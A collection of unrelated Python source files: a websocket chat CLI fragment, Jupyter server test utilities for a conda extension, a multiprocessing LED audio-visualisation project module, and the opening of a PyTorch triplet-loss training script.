print(">> " + utterance)
def handle_test(event):
print(event.data['utterances'][0])
def handle_finish(event):
print("Finish")
def connect():
# Once the websocket has connected, just watch it for speak events
ws.run_forever()
ws = WebsocketClient()
ws.on('speak', handle_speak)
ws.on('onyx_recognizer:utterance', handle_test)
ws.on('finish', handle_finish)
event_thread = Thread(target=connect)
event_thread.setDaemon(True)
event_thread.start()
def cli():
while True:
try:
time.sleep(1.5)
result = input('You: ')
print ("Sending message...")
payload = {
'utterances': [result]
}
ws.emit(Message('onyx_recognizer:utterance', payload))
ws.emit(Message('speak', result))
except (KeyboardInterrupt, EOFError, SystemExit):
break
if __name__ == "__main__":
cli()
|
utils.py
|
import datetime
import errno
import json
import os
import sys
import time
from binascii import hexlify
from threading import Event, Thread
from typing import List
from unittest import TestCase
from unittest.mock import patch
import jupyter_core.paths
import requests
from ipython_genutils.tempdir import TemporaryDirectory
from tornado.ioloop import IOLoop
from traitlets.config import Config
from mamba_gator.handlers import NS
# Shim for notebook server or jupyter_server
#
# Provides:
# - ServerTestBase
# - assert_http_error
# - url_escape
# - url_path_join
try:
from notebook.tests.launchnotebook import (
assert_http_error,
NotebookTestBase as ServerTestBase,
)
from notebook.utils import url_escape, url_path_join
from notebook.notebookapp import NotebookApp as ServerApp
except ImportError:
from jupyter_server.tests.launchnotebook import assert_http_error # noqa
from jupyter_server.tests.launchserver import ServerTestBase # noqa
from jupyter_server.utils import url_escape, url_path_join # noqa
from jupyter_server.serverapp import ServerApp # noqa
TIMEOUT = 150
SLEEP = 1
class APITester(object):
"""Wrapper for REST API requests"""
url = "/"
def __init__(self, request):
self.request = request
def _req(self, verb: str, path: List[str], body=None, params=None):
if body is not None:
body = json.dumps(body)
response = self.request(
verb, url_path_join(self.url, *path), data=body, params=params
)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()["message"]
except Exception:
pass
response.raise_for_status()
return response
class JupyterCondaAPI(APITester):
"""Wrapper for nbconvert API calls."""
url = NS
def delete(self, path: List[str], body=None, params=None):
return self._req("DELETE", path, body, params)
def get(self, path: List[str], body=None, params=None):
return self._req("GET", path, body, params)
def patch(self, path: List[str], body=None, params=None):
return self._req("PATCH", path, body, params)
def post(self, path: List[str], body=None, params=None):
return self._req("POST", path, body, params)
def envs(self):
return self.get(["environments"]).json()
class ServerTest(ServerTestBase):
# Force extension enabling - Disabled by parent class otherwise
config = Config({"NotebookApp": {"nbserver_extensions": {"mamba_gator": True}}})
@classmethod
def setup_class(cls):
# Copy paste from https://github.com/jupyter/notebook/blob/6.0.0/notebook/tests/launchnotebook.py
# Only to suppress setting PYTHONPATH with sys.path
# For notebook v6 we could overwrite get_env_patch but unfortunately it is not available for Python 3.5
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp("home")
data_dir = cls.data_dir = tmp("data")
config_dir = cls.config_dir = tmp("config")
runtime_dir = cls.runtime_dir = tmp("runtime")
cls.notebook_dir = tmp("notebooks")
cls.env_patch = patch.dict(
"os.environ",
{
"HOME": cls.home_dir,
"IPYTHONDIR": os.path.join(cls.home_dir, ".ipython"),
"JUPYTER_NO_CONFIG": "1", # needed in the future
"JUPYTER_CONFIG_DIR": cls.config_dir,
"JUPYTER_DATA_DIR": cls.data_dir,
"JUPYTER_RUNTIME_DIR": cls.runtime_dir,
},
)
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp("share", "jupyter")],
ENV_JUPYTER_PATH=[tmp("env", "share", "jupyter")],
SYSTEM_CONFIG_PATH=[tmp("etc", "jupyter")],
ENV_CONFIG_PATH=[tmp("env", "etc", "jupyter")],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ":memory:"
cls.token = hexlify(os.urandom(4)).decode("ascii")
started = Event()
def start_thread():
if "asyncio" in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = ServerApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize()
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
def setUp(self):
super(ServerTest, self).setUp()
self.conda_api = JupyterCondaAPI(self.request)
def wait_task(self, endpoint: str):
start_time = datetime.datetime.now()
if endpoint.startswith("/" + NS):
endpoint = endpoint[len(NS) + 1 :]
while (datetime.datetime.now() - start_time).total_seconds() < TIMEOUT:
time.sleep(SLEEP)
response = self.conda_api.get([endpoint])
response.raise_for_status()
if response.status_code != 202:
return response
raise RuntimeError("Request {} timed out.".format(endpoint))
|
project.py
|
import asyncio
from audioled.filtergraph import (FilterGraph, Updateable)
from typing import List, Dict
import audioled.devices
import audioled.audio
import audioled.filtergraph
import time
import multiprocessing as mp
import traceback
import ctypes
import os
from functools import wraps
import numpy as np
def ensure_parent(func):
@wraps(func)
def inner(self, *args, **kwargs):
if os.getpid() != self._creator_pid:
raise RuntimeError("{} can only be called in the " "parent.".format(func.__name__))
return func(self, *args, **kwargs)
return inner
class PublishQueue(object):
def __init__(self):
self._queues = [] # type: List[mp.JoinableQueue]
self._creator_pid = os.getpid()
def __getstate__(self):
self_dict = self.__dict__
self_dict['_queues'] = []
return self_dict
def __setstate__(self, state):
self.__dict__.update(state)
@ensure_parent
def register(self):
q = mp.JoinableQueue()
self._queues.append(q)
return q
@ensure_parent
def unregister(self, q):
self._queues = [queue for queue in self._queues if queue is not q]
@ensure_parent
def publish(self, val):
for q in self._queues:
q.put(val, True, 1)
@ensure_parent
def close(self):
for q in self._queues:
q.close()
@ensure_parent
def join_thread(self):
for q in self._queues:
q.join_thread()
@ensure_parent
def join(self, timeout=None):
# Join without timeout
if timeout is None:
for q in self._queues:
q.join()
return
# Join with timeout
stop = time.time() + timeout
all_done = False
while not all_done and time.time() < stop:
time.sleep(0.001)
all_done = True
for q in self._queues:
if not q._unfinished_tasks._semlock._is_zero():
all_done = False
if all_done:
for q in self._queues:
q.join()
return
raise TimeoutError
class UpdateMessage:
def __init__(self, dt, audioBuffer):
self.dt = dt
self.audioBuffer = audioBuffer
class ReplaceFiltergraphMessage:
def __init__(self, deviceId, slotId, filtergraph):
self.filtergraph = filtergraph
self.slotId = slotId
self.deviceId = deviceId
def __str__(self):
return "FiltergraphMessage - deviceId: {}, slotId: {}, filtergraph: {}".format(self.deviceId, self.slotId,
self.filtergraph)
class NodeMessage:
def __init__(self, slotId, nodeUid, operation, params=None):
self.slotId = slotId
self.nodeUid = nodeUid
self.operation = operation
self.params = params
def __str__(self):
return "NodeMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(self.slotId, self.nodeUid, self.operation,
self.params)
class ModulationMessage:
def __init__(self, slotId, modUid, operation, params=None):
self.slotId = slotId
self.modUid = modUid
self.operation = operation
self.params = params
def __str__(self):
return "ModulationMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.modUid, self.operation, self.params)
class ModulationSourceMessage:
def __init__(self, slotId, modSourceUid, operation, params=None):
self.slotId = slotId
self.modSourceUid = modSourceUid
self.operation = operation
self.params = params
def __str__(self):
return "ModulationSourceMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.modSourceUid, self.operation, self.params)
class ConnectionMessage:
def __init__(self, slotId, conUid, operation, params=None):
self.slotId = slotId
self.conUid = conUid
self.operation = operation
self.params = params
def __str__(self):
return "ConnectionMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.conUid, self.operation, self.params)
def worker_process_updateMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
event_loop, message: UpdateMessage):
dt = message.dt
audioBuffer = message.audioBuffer
# print("got item {} in process {}".format(dt, os.getpid()))
# TODO: Hack to propagate audio?
audioled.audio.GlobalAudio.buffer = audioBuffer
# Update Filtergraph
filtergraph.update(dt, event_loop)
filtergraph.process()
# Propagate to outDevice
try:
if filtergraph.getLEDOutput() is None:
return
fgBuffer = filtergraph.getLEDOutput()._outputBuffer
if fgBuffer is None or len(fgBuffer) <= 0:
return
outputDevice.show(fgBuffer[0])
except Exception as e:
print("Error propagating to device: {}".format(e))
def worker_process_nodeMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: NodeMessage):
if message.slotId != slotId:
# Message not meant for this slot
print("Skipping node message for slot {}".format(message.slotId))
return
print("Process node message: {}".format(message))
if message.operation == 'add':
node = filtergraph.addEffectNode(message.params)
node.uid = message.nodeUid
elif message.operation == 'remove':
filtergraph.removeEffectNode(message.nodeUid)
elif message.operation == 'update':
filtergraph.updateNodeParameter(message.nodeUid, message.params)
def worker_process_modulationMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ModulationMessage):
if message.slotId != slotId:
print("Skipping modulation message for slot {}".format(message.slotId))
return
print("Process modulation message: {}".format(message))
if message.operation == 'add':
mod = message.params # type: audioled.filtergraph.Modulation
newMod = filtergraph.addModulation(modSourceUid=mod.modulationSource.uid,
targetNodeUid=mod.targetNode.uid,
targetParam=mod.targetParameter,
amount=mod.amount,
inverted=mod.inverted)
newMod.uid = mod.uid
elif message.operation == 'remove':
filtergraph.removeModulation(message.modUid)
elif message.operation == 'update':
filtergraph.updateModulationParameter(message.modUid, message.params)
def worker_process_modulationSourceMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ModulationSourceMessage):
if message.slotId != slotId:
print("Skipping modulation source message for slot {}".format(message.slotId))
return
print("Process modulation source message: {}".format(message))
if message.operation == 'add':
modSource = message.params
newModSource = filtergraph.addModulationSource(modSource)
newModSource.uid = modSource.uid
elif message.operation == 'remove':
filtergraph.removeModulationSource(message.modSourceUid)
elif message.operation == 'update':
filtergraph.updateModulationSourceParameter(message.modSourceUid, message.params)
def worker_process_connectionMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ConnectionMessage):
if message.slotId != slotId:
print("Skipping connection message for slot {}".format(message.slotId))
return
print("Process connection message: {}".format(message))
if message.operation == 'add':
con = message.params # type: Dict[str, str]
newCon = filtergraph.addNodeConnection(con['from_node_uid'], con['from_node_channel'], con['to_node_uid'],
con['to_node_channel'])
newCon.uid = con['uid']
elif message.operation == 'remove':
filtergraph.removeConnection(message.conUid)
def worker(q: PublishQueue, filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, deviceId: int,
slotId: int):
"""Worker process for specific filtergraph for outputDevice
Arguments:
q {PublishQueue} -- [description]
filtergraph {FilterGraph} -- [description]
outputDevice {audioled.devices.LEDController} -- [description]
slotId {int} -- [description]
"""
try:
print("process {} start".format(os.getpid()))
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
filtergraph.propagateNumPixels(outputDevice.getNumPixels(), outputDevice.getNumRows())
for message in iter(q.get, None):
try:
if isinstance(message, UpdateMessage):
worker_process_updateMessage(filtergraph, outputDevice, slotId, event_loop, message)
elif isinstance(message, NodeMessage):
worker_process_nodeMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ModulationMessage):
worker_process_modulationMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ModulationSourceMessage):
worker_process_modulationSourceMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ConnectionMessage):
worker_process_connectionMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ReplaceFiltergraphMessage):
if message.deviceId == deviceId:
filtergraph = message.filtergraph
slotId = message.slotId
filtergraph.propagateNumPixels(outputDevice.getNumPixels(), outputDevice.getNumRows())
else:
print("Message not supported: {}".format(message))
except audioled.filtergraph.NodeException:
# TODO: Propagate NodeException to project
print("Continuing on NodeException")
finally:
# print("{} done".format(os.getpid()))
# q.task_done()
# TODO: Investigate the task_done() called too many times error further
# Quick fix seems to be:
with q._cond:
if not q._unfinished_tasks.acquire(True):
raise ValueError('task_done() called too many times')
if q._unfinished_tasks._semlock._is_zero():
q._cond.notify_all()
outputDevice.shutdown()
print("process {} exit".format(os.getpid()))
except Exception as e:
traceback.print_exc()
print("process {} exited due to: {}".format(os.getpid(), e))
except:
print("process interrupted")
def output(q, outputDevice: audioled.devices.LEDController, virtualDevice: audioled.devices.VirtualOutput):
try:
print("output process {} start".format(os.getpid()))
for message in iter(q.get, None):
npArray = np.ctypeslib.as_array(virtualDevice._shared_array.get_obj()).reshape(3, -1)
outputDevice.show(npArray.reshape(3, -1, order='C'))
q.task_done()
outputDevice.shutdown()
print("output process {} exit".format(os.getpid()))
except Exception as e:
traceback.print_exc()
print("process {} exited due to: {}".format(os.getpid(), e))
except:
print("process interrupted")
class Project(Updateable):
def __init__(self, name='Empty project', description='', device=None):
self.slots = [None for i in range(127)]
self.activeSceneId = 0
self.activeSlotId = 0
self.name = name
self.description = description
self.id = None
self.outputSlotMatrix = {}
self.__initstate__()
def __initstate__(self):
try:
self.outputSlotMatrix
except AttributeError:
self.outputSlotMatrix = {}
try:
self.activeSceneId
except AttributeError:
self.activeSceneId = self.activeSlotId
self._previewDevice = None # type: audioled.devices.LEDController
self._previewDeviceIndex = 0
self._contentRoot = None
self._devices = []
self._filterGraphForDeviceIndex = {}
self._filtergraphProcesses = {}
self._outputProcesses = {}
self._publishQueue = PublishQueue()
self._showQueue = PublishQueue()
self._lock = mp.Lock()
self._processingEnabled = True
def __cleanState__(self, stateDict):
"""
Cleans given state dictionary from state objects beginning with _
"""
for k in list(stateDict.keys()):
if k.startswith('_'):
stateDict.pop(k)
return stateDict
def __getstate__(self):
"""
Default implementation of __getstate__ that deletes buffer, call __cleanState__ when overloading
"""
state = self.__dict__.copy()
self.__cleanState__(state)
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.__initstate__()
idx = -1
for slot in self.slots:
idx += 1
# Initialize Project Callback
if slot is not None:
slot._contentRoot = self._contentRoot
# Activate loaded scene
if self.activeSceneId is not None:
print("Active scene {}".format(self.activeSceneId))
self.activateScene(self.activeSceneId)
def setDevice(self, device: audioled.devices.MultiOutputWrapper):
print("setting device")
if not isinstance(device, audioled.devices.MultiOutputWrapper):
raise RuntimeError("Device has to be MultiOutputWrapper")
if self._devices == device._devices:
return
self._devices = device._devices
print("Devices updated. Renewing active scene...")
self.stopProcessing()
if self.activeSceneId is not None:
self.activateScene(self.activeSceneId)
def update(self, dt, event_loop=asyncio.get_event_loop()):
"""Update active FilterGraph
Arguments:
dt {[float]} -- Time since last update
"""
# print("project: update")
if self._processingEnabled:
aquired = self._lock.acquire(block=True, timeout=0)
if not aquired:
print("Skipping update, couldn't acquire lock")
return
try:
self._sendUpdateCommand(dt)
self._updatePreviewDevice(dt, event_loop)
# Wait for previous show command done
if self._showQueue is not None:
self._showQueue.join(1)
# Wait for all updates
if self._publishQueue is not None:
self._publishQueue.join(1)
# Send show command and return
self._sendShowCommand()
except TimeoutError:
print("Update timeout. Forcing reset")
self.stopProcessing()
if self.activeSceneId is not None:
self.activateScene(self.activeSceneId)
finally:
self._lock.release()
else:
time.sleep(0.01)
print("Waiting...")
def process(self):
"""Process active FilterGraph
"""
self._processPreviewDevice()
def setFiltergraphForSlot(self, slotId, filterGraph):
print("Set {} for slot {}".format(filterGraph, slotId))
if isinstance(filterGraph, FilterGraph):
filterGraph._contentRoot = self._contentRoot
self.slots[slotId] = filterGraph
def activateScene(self, sceneId):
"""Activates a scene
Scene: Project Slot per Output Device
"""
print("activate scene {}".format(sceneId))
# TODO: Make configurable
self._previewDeviceIndex = None
self.activeSceneId = sceneId
self._processingEnabled = False
self._lock.acquire()
try:
# Create new publish queue
if self._publishQueue is None:
self._publishQueue = PublishQueue()
# Create new show queue
if self._showQueue is None:
self._showQueue = PublishQueue()
# Instanciate new scene
dIdx = 0
for device in self._devices:
# Get slot Id associated with this device
try:
slotId = self.outputSlotMatrix[str(dIdx)][str(sceneId)]
except Exception:
# Backwards compatibility: Init with slotId = sceneId
if str(dIdx) not in self.outputSlotMatrix:
self.outputSlotMatrix[str(dIdx)] = {}
if sceneId not in self.outputSlotMatrix[str(dIdx)]:
self.outputSlotMatrix[str(dIdx)][str(sceneId)] = sceneId
slotId = sceneId
# Get filtergraph
filterGraph = self.getSlot(slotId)
if dIdx == self._previewDeviceIndex:
dIdx += 1
continue
self._createOrUpdateProcess(dIdx, device, slotId, filterGraph)
dIdx += 1
finally:
self._processingEnabled = True
print("activate scene - releasing lock")
self._lock.release()
def _createOrUpdateProcess(self, dIdx, device, slotId, filterGraph):
if dIdx in self._filtergraphProcesses:
# Send command
self._sendReplaceFiltergraphCommand(dIdx, slotId, filterGraph)
return
# Create device
outputDevice = None
virtualDevice = None
fgDevice = None
if isinstance(device, audioled.devices.VirtualOutput):
# Reuse virtual output, construct output process if not already present
virtualDevice = device
realDevice = virtualDevice.device
fgDevice = device
if realDevice not in self._outputProcesses:
outputDevice = realDevice
pass
elif isinstance(device, audioled.devices.PanelWrapper):
if isinstance(device.device, audioled.devices.VirtualOutput):
fgDevice = device # PanelWrapper
virtualDevice = fgDevice.device # VirtualDevice
realDevice = virtualDevice.device # Select real device in virtualoutput
if realDevice not in self._outputProcesses:
outputDevice = realDevice
else:
oldPanelWrapper = device
# Construct virtual output, TODO: Make sure device is realDevice...
realDevice = oldPanelWrapper.device
lock = mp.Lock()
array = mp.Array(ctypes.c_uint8, 3 * device.getNumPixels(), lock=lock)
virtualDevice = audioled.devices.VirtualOutput(device=realDevice,
num_pixels=realDevice.getNumPixels(),
shared_array=array,
shared_lock=lock,
num_rows=realDevice.getNumRows(),
start_index=0)
oldPanelWrapper.setDevice(virtualDevice)
fgDevice = oldPanelWrapper
else:
# New virtual output
outputDevice = device
lock = mp.Lock()
array = mp.Array(ctypes.c_uint8, 3 * device.getNumPixels(), lock=lock)
virtualDevice = audioled.devices.VirtualOutput(device=device,
num_pixels=device.getNumPixels(),
shared_array=array,
shared_lock=lock,
num_rows=device.getNumRows(),
start_index=0)
fgDevice = virtualDevice
realDevice = device
# Start filtergraph process
successful = False
while not successful:
q = self._publishQueue.register()
p = mp.Process(target=worker, args=(q, filterGraph, fgDevice, dIdx, slotId))
p.start()
# Process sometimes doesn't start...
q.put(123)
time.sleep(0.1)
if not q._unfinished_tasks._semlock._is_zero():
print("Process didn't respond in time!")
self._publishQueue.unregister(q)
p.join(0.1)
if p.is_alive():
p.terminate()
else:
successful = True
self._filtergraphProcesses[dIdx] = p
print('Started process for device {} with device {}'.format(dIdx, fgDevice))
# Start output process
if outputDevice is not None:
outSuccessful = False
while not outSuccessful:
q = self._showQueue.register()
p = mp.Process(target=output, args=(q, outputDevice, virtualDevice))
p.start()
# Make sure process starts
q.put("test")
time.sleep(0.1)
if not q._unfinished_tasks._semlock._is_zero():
print("Output process didn't respond in time!")
self._showQueue.unregister(p)
p.join(0.1)
if p.is_alive():
p.terminate()
else:
outSuccessful = True
q.put("first")
self._outputProcesses[outputDevice] = p
print("Started output process for device {}".format(outputDevice))
def stopProcessing(self):
print('Stop processing')
self._processingEnabled = False
aquire = self._lock.acquire(block=True, timeout=1)
if not aquire:
print("Couldn't get lock. Force shutdown")
try:
for p in self._filtergraphProcesses.values():
p.join(0.1)
if p.is_alive():
p.terminate()
for p in self._outputProcesses.values():
p.join(0.1)
if p.is_alive():
p.terminate()
self._lock.release()
finally:
self._filtergraphProcesses = {}
self._outputProcesses = {}
self._publishQueue = None
self._showQueue = None
self._processingEnabled = True
return
# Normal shutdown
try:
print("Ending queue")
if self._publishQueue is not None:
self._publishQueue.publish(None)
self._publishQueue.close()
self._publishQueue.join_thread()
print('Publish queue ended')
self._publishQueue = None
if self._showQueue is not None:
self._showQueue.publish(None)
self._showQueue.close()
self._showQueue.join_thread()
print("Show queue ended")
self._showQueue = None
print("Ending processes")
for p in self._filtergraphProcesses.values():
p.join()
print("Filtergraph processes joined")
self._filtergraphProcesses = {}
for p in self._outputProcesses.values():
p.join()
print("Output processes joined")
self._outputProcesses = {}
print('All processes joined')
finally:
print("stop processing - releasing lock")
self._lock.release()
self._processingEnabled = True
def previewSlot(self, slotId):
# Remove eventing from current previewSlot
fg = self.getSlot(self.activeSceneId) # type: FilterGraph
fg._onConnectionAdded = None
fg._onConnectionRemoved = None
fg._onModulationAdded = None
fg._onModulationRemoved = None
fg._onModulationSourceAdded = None
fg._onModulationSourceRemoved = None
fg._onModulationSourceUpdate = None
fg._onModulationUpdate = None
fg._onNodeAdded = None
fg._onNodeRemoved = None
fg._onNodeUpdate = None
self.activeSlotId = slotId
print("Edit slot {} with {}".format(slotId, self.slots[slotId]))
fg = self.getSlot(slotId) # type: FilterGraph
fg._onNodeAdded = self._handleNodeAdded
fg._onNodeRemoved = self._handleNodeRemoved
fg._onNodeUpdate = self._handleNodeUpdate
fg._onModulationAdded = self._handleModulationAdded
fg._onModulationRemoved = self._handleModulationRemoved
fg._onModulationUpdate = self._handleModulationUpdate
fg._onModulationSourceAdded = self._handleModulationSourceAdded
fg._onModulationSourceRemoved = self._handleModulationSourceRemoved
fg._onModulationSourceUpdate = self._handleModulationSourceUpdate
fg._onConnectionAdded = self._handleConnectionAdded
fg._onConnectionRemoved = self._handleConnectionRemoved
def getSlot(self, slotId):
if self.slots[slotId] is None:
print("Initializing slot {}".format(slotId))
self.slots[slotId] = FilterGraph()
fg = self.slots[slotId]
fg._contentRoot = self._contentRoot
return fg
def getSceneMatrix(self):
numDevices = len(self._devices)
retMatrix = {}
for i in range(0, numDevices):
if i in self.outputSlotMatrix:
retMatrix[i] = self.outputSlotMatrix[i]
if '%s' % i in self.outputSlotMatrix:
retMatrix[i] = self.outputSlotMatrix['%s' % i]
return retMatrix
def setSceneMatrix(self, value):
# TODO: Validate
for key, val in value.items():
self.outputSlotMatrix[key] = val
self.activateScene(self.activeSceneId)
def _handleNodeAdded(self, node: audioled.filtergraph.Node):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'add', node.effect))
finally:
self._lock.release()
def _handleNodeRemoved(self, node: audioled.filtergraph.Node):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'remove'))
finally:
self._lock.release()
def _handleNodeUpdate(self, node: audioled.filtergraph.Node, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleModulationAdded(self, mod: audioled.filtergraph.Modulation):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'add', mod))
finally:
self._lock.release()
def _handleModulationRemoved(self, mod: audioled.filtergraph.Modulation):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'remove'))
finally:
self._lock.release()
def _handleModulationUpdate(self, mod: audioled.filtergraph.Modulation, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleModulationSourceAdded(self, modSource: audioled.filtergraph.ModulationSourceNode):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'add', modSource))
finally:
self._lock.release()
def _handleModulationSourceRemoved(self, modSource: audioled.filtergraph.ModulationSourceNode):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'remove'))
finally:
self._lock.release()
def _handleModulationSourceUpdate(self, modSource: audioled.filtergraph.ModulationSourceNode, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleConnectionAdded(self, con: audioled.filtergraph.Connection):
self._lock.acquire()
try:
self._publishQueue.publish(ConnectionMessage(self.activeSlotId, con.uid, 'add', con.__getstate__()))
finally:
self._lock.release()
def _handleConnectionRemoved(self, con: audioled.filtergraph.Connection):
self._lock.acquire()
try:
self._publishQueue.publish(ConnectionMessage(self.activeSlotId, con.uid, 'remove'))
finally:
self._lock.release()
def _sendUpdateCommand(self, dt):
if self._publishQueue is None:
print("No publish queue. Possibly exiting")
return
self._publishQueue.publish(UpdateMessage(dt, audioled.audio.GlobalAudio.buffer))
def _sendShowCommand(self):
if self._showQueue is None:
print("No show queue. Possibly exiting")
return
self._showQueue.publish("show!")
def _sendReplaceFiltergraphCommand(self, dIdx, slotId, filtergraph):
self._publishQueue.publish(ReplaceFiltergraphMessage(dIdx, slotId, filtergraph))
def _updatePreviewDevice(self, dt, event_loop=asyncio.get_event_loop()):
# Process preview in this process
if self._previewDeviceIndex is not None:
activeFilterGraph = self.getSlot(self.activeSceneId)
if activeFilterGraph is None:
return
previewDevice = self._devices[self._previewDeviceIndex]
if previewDevice is not None and activeFilterGraph.getLEDOutput() is not None:
if (previewDevice.getNumPixels() != activeFilterGraph.getLEDOutput().effect.getNumOutputPixels()
or previewDevice.getNumRows() != activeFilterGraph.getLEDOutput().effect.getNumOutputRows()):
print("propagating {} pixels on {} rows".format(previewDevice.getNumPixels(), previewDevice.getNumRows()))
activeFilterGraph.propagateNumPixels(previewDevice.getNumPixels(), previewDevice.getNumRows())
activeFilterGraph.update(dt, event_loop)
def _processPreviewDevice(self):
"""Process active FilterGraph
"""
# Process preview in this process
if self._previewDeviceIndex is not None:
activeFilterGraph = self.getSlot(self.activeSceneId)
if activeFilterGraph is None:
return
previewDevice = self._devices[self._previewDeviceIndex]
if previewDevice is not None and activeFilterGraph.getLEDOutput() is not None:
activeFilterGraph.process()
if activeFilterGraph.getLEDOutput()._outputBuffer[0] is not None:
previewDevice.show(activeFilterGraph.getLEDOutput()._outputBuffer[0])
|
train_ltcn_depth.py
|
import os
import argparse
import torch
import numpy as np
import pickle
import sys
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.util import distance, Logger, ensure_folder, collate_fn
from utils.builders import SingleViewDepthTripletRCNNBuilder
from utils.vocabulary import Vocabulary
from tcn import define_model_ltcn_depth, define_model_ltcn
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
from utils.plot_utils import plot_mean
IMAGE_SIZE = (299, 299)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "1,2"
ITERATE_OVER_TRIPLETS = 3
EXP_DIR = '/media/msieb/data/tcn_data/experiments/cube_rotating/'
EXP_NAME = 'cube_rotating'
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--start-epoch', type=int, default=0)
parser.add_argument('--epochs', type=int, default=1000)
parser.add_argument('--save-every', type=int, default=5)
parser.add_argument('--model-folder', type=str, default=EXP_DIR + 'trained_models/ltcn-roi-sv')
parser.add_argument('--load-model', type=str, required=False)
# parser.add_argument('--train-directory', type=str, default='./data/multiview-pouring/train/')
# parser.add_argument('--validation-directory', type=str, default='./data/multiview-pouring/val/')
parser.add_argument('--train-directory', type=str, default=EXP_DIR + 'videos/train/')
parser.add_argument('--train-directory-depth', type=str, default=EXP_DIR + 'depth/train/')
parser.add_argument('--validation-directory', type=str, default=EXP_DIR + 'videos/valid/')
parser.add_argument('--validation-directory-depth', type=str, default=EXP_DIR + 'depth/valid/')
parser.add_argument('--minibatch-size', type=int, default=16)
parser.add_argument('--margin', type=float, default=2.0)
parser.add_argument('--model-name', type=str, default='ltcn')
parser.add_argument('--log-file', type=str, default='./out.log')
parser.add_argument('--lr-start', type=float, default=0.001)
parser.add_argument('--triplets-from-videos', type=int, default=5)
parser.add_argument('--n-views', type=int, default=3)
parser.add_argument('--alpha', type=float, default=0.001, help='weighing factor of language loss to triplet loss')
# parser.add_argument('--model_path', type=str, default='models/' , help='path for saving trained models')
# parser.add_argument('--crop_size', type=int, default=224 , help='size for randomly cropping images')
# parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')
# parser.add_argument('--image_dir', type=str, default='data/resized2014', help='directory for resized images')
# parser.add_argument('--caption_path', type=str, default='data/annotations/captions_train2014.json', help='path for train annotation json file')
# parser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')
# parser.add_argument('--save_step', type=int , default=1000, help='step size for saving trained models')
# Model parameters
parser.add_argument('--embed_size', type=int , default=32, help='dimension of word embedding vectors')
parser.add_argument('--hidden_size', type=int , default=256, help='dimension of lstm hidden states')
parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')
# parser.add_argument('--num_epochs', type=int, default=5)
# parser.add_argument('--batch_size', type=int, default=128)
# parser.add_argument('--num_workers', type=int, default=2)
# parser.add_argument('--learning_rate', type=float, default=0.001)
return parser.parse_args()
args = get_args()
print(args)
builder = SingleViewDepthTripletRCNNBuilder
logger = Logger(args.log_file)
def batch_size(epoch, max_size):
exponent = epoch // 100
return min(max(2 ** (exponent), 2), max_size)
